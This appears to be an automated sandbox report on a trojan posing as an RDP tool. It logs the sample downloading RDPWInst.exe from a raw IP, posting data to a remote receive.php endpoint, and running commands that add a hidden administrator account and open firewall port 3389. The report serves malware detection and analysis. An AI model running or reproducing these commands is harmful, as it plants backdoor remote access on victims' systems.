                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: unknownTCP traffic detected without corresponding DNS query: 147.45.44.104
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0043CF60 InternetOpenW,InternetOpenUrlW,InternetCloseHandle,InternetReadFile,InternetCloseHandle,InternetCloseHandle,8_2_0043CF60
                            Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                            Source: global trafficDNS traffic detected: DNS query: hansgborn.eu
                            Source: unknownHTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 193Expect: 100-continueConnection: Keep-Alive
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:23:44 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeX-Content-Type-Options: nosniffCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n78Cuf5jALD%2BIbhiTCL4zbEwvNVt7zS7jEAlYva6PGfsrEFdGWZ5N3o80l8KBOuvC9cd%2FGlXNVidCcCS5S7I%2Fs3dcjDUXlBY9rTtQnB2KT6vpZPClKSJuOLsjYLOJus%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8cf253cb5d417c8d-EWR92<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eu
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eud
                            Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                            Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                            Source: RDPWInst.exe, RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://stascorp.com/load/1-1-0-62
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.dr, rdpwrap.dll.8.drString found in binary or memory: http://stascorp.comDVarFileInfo$
                            Source: Amcache.hve.38.drString found in binary or memory: http://upx.sf.net
                            Source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://www.apache.org/licenses/
                            Source: RDPWInst.exe, 00000008.00000002.1464282028.0000000000450000.00000002.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                            Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/lontivero/Open.Nat/issuesOAlso
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002CF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/receive.php
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://hansgborn.eu/receive.phpd
                            Source: RDPWInst.exeString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
                            Source: RDPWInst.exe, 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, RDPWInst.exe.0.drString found in binary or memory: https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
                            Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
                            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
                            Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.8:49712 version: TLS 1.2
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Windows\System32\rfxvmt.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeCode function: 0_2_02ADA1680_2_02ADA168
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeCode function: 0_2_02AD91500_2_02AD9150
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeCode function: 0_2_02AD94980_2_02AD9498
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0040360C8_2_0040360C
                            Source: Joe Sandbox ViewDropped File: C:\Program Files\RDP Wrapper\rdpwrap.dll 798AF20DB39280F90A1D35F2AC2C1D62124D1F5218A2A0FA29D87A13340BD3E4
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00406BE0 appears 36 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00404CDC appears 74 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 00407450 appears 135 times
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: String function: 004042F8 appears 74 times
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (console) Intel 80386, for MS Windows
                            Source: RDPWInst.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32+ executable (DLL) (console) x86-64, for MS Windows
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRDPWInst.exeB vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919966763.0000000002DB5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamerfxvmt.dllj% vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe, 00000000.00000000.1405997855.0000000000882000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameRDPCreator.exe4 vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919496760.0000000000EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exe, 00000000.00000002.1920702414.00000000050F0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameOpen.Nat.dll2 vs hloRQZmlfg.exe
                            Source: hloRQZmlfg.exeBinary or memory string: OriginalFilenameRDPCreator.exe4 vs hloRQZmlfg.exe
                            Source: unknownDriver loaded: C:\Windows\System32\drivers\rdpvideominiport.sys
                            Source: hloRQZmlfg.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                            Source: hloRQZmlfg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: hloRQZmlfg.exe, QXNzZW1ibHlMb2FkZXJB.csBase64 encoded string: 'w75gTK5M6nzjTjnU+EoLi93dybDJuhTv6xUfacOqvm3ntZls9kVKGw==', 'GIKjK8lRUDXDvmBMrkzqfONOOdT4SguL3d3JsMm6FO/rFR9pw6q+bdiuJS1yJj2wOTluGm4Gl9mQZennlkDvjw=='
                            Source: hloRQZmlfg.exe, UkRQSW5zdGFsbGVyQUFB.csBase64 encoded string: 'Jgk+cpobi4HBt1lw0WE9XNJ89TCIzlhBNL/zJLRgBlm9Fes8fLy7lOqxaoMMFYu4h05s9jjqJGLgjuTH0E+V5A==', 'Jgk+cpobi4HBt1lw0WE9XNJ89TCIzlhBNL/zJLRgBlm9Fes8fLy7lOqxaoMMFYu4h05s9jjqJGLgjuTH0E+V5A==', 'JehuIqkfsZQn0wkdwp2Nv/y8T+57Hbz4jwTgsn8AMlfxiUVZPRQx54pSXRY9M8JQ2umoxBO/Qdf/mHep3Ig9TJeUj4V6VmCFYjcojSKP1YckClxyst9NgCfGZwdRs5kQOl2e24zkqDU='
                            Source: hloRQZmlfg.exe, U3lzdGVtSW5mb0FB.csBase64 encoded string: 'U2dyW+WlE2YacbhqD8LQw/dYBPvUOuPoVsunzrPAfQoHVJJcYxfAV2E0Ximq0mTO24Gft0ff19E6XZ7bjOSoNQ==', 'Xq8So407SNKAzRfCmuKT/ly3DrFODnX5uyrwLzvgmMo6XZ7bjOSoNQ==', 'Xq8So407SNLaCDu3SJO0Fc9Z8WHbi8GwQ2lpakbFuh4TfVtQ1EKwfULNkulliuVh', 'Xq8So407SNKAzRfCmuKT/kOCDYZigawGtO0vHjFlULSJJMEG9cpg/A==', 'Hvsa0AhhunjG28J8qAHgRJENLhIM1RWb/F5T453A6UKDTIehOAc8i41KEtlAK0ui', 'Q7n1HoDaVCNv7RNvVd9BtzWPUPtXLvcOQk9qkg0DAsLpFtHAxn6PWy8NKefrC0og'
                            Source: hloRQZmlfg.exe, 00000000.00000002.1919496760.0000000000F16000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AutomaticEngineRollbackMode;.VBP
                            Source: classification engineClassification label: mal100.spre.troj.evad.winEXE@38/13@2/5
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0043BF00 GetCurrentProcess,OpenProcessToken,GetLastError,LookupPrivilegeValueW,GetLastError,AdjustTokenPrivileges,GetLastError,8_2_0043BF00
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0040FAE8 GetDiskFreeSpaceW,8_2_0040FAE8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0043DC64 LoadLibraryExW,FindResourceW,LoadResource,FreeLibrary,8_2_0043DC64
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeCode function: 8_2_0043B1A8 OpenSCManagerW,GetLastError,OpenServiceW,CloseServiceHandle,GetLastError,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,CloseServiceHandle,8_2_0043B1A8
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeFile created: C:\Program Files\RDP WrapperJump to behavior
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:760:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4820:120:WilError_03
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeMutant created: NULL
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5656:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7132:120:WilError_03
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6872:120:WilError_03
                            Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2444
                            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6052:120:WilError_03
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeFile created: C:\Users\user\AppData\Local\Temp\RDPWInst.exeJump to behavior
                            Source: Yara matchFile source: 8.2.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 8.0.RDPWInst.exe.400000.0.unpack, type: UNPACKEDPE
                            Source: Yara matchFile source: 00000008.00000002.1463971744.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: 00000008.00000000.1434233686.0000000000401000.00000020.00000001.01000000.00000008.sdmp, type: MEMORY
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\RDPWInst.exe, type: DROPPED
                            Source: hloRQZmlfg.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
                            Source: hloRQZmlfg.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name FROM Win32_Processor
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT NumberOfCores FROM Win32_Processor
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                            Source: hloRQZmlfg.exeReversingLabs: Detection: 63%
                            Source: hloRQZmlfg.exeVirustotal: Detection: 71%
                            Source: RDPWInst.exeString found in binary or memory: Link: http://stascorp.com/load/1-1-0-62
                            Source: unknownProcess created: C:\Users\user\Desktop\hloRQZmlfg.exe "C:\Users\user\Desktop\hloRQZmlfg.exe"
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net user RDPUser_1e47a393 GEdtvn58rfdr /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_1e47a393 GEdtvn58rfdr /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /add
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /add
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2444 -s 2756
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c net userJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -iJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net userJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 userJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\RDPWInst.exe C:\Users\user\AppData\Local\Temp\RDPWInst.exe -iJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allowJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net user RDPUser_1e47a393 GEdtvn58rfdr /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 user RDPUser_1e47a393 GEdtvn58rfdr /addJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroupJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389Jump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net localgroup "Administrators" RDPUser_1e47a393 /addJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 localgroup "Administrators" RDPUser_1e47a393 /addJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\hloRQZmlfg.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Windows\SysWOW64\net1.exeSection loaded: samlib.dllJump to behavior
                            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\RDPWInst.exeSection loaded: wininet.dllJump to behavior
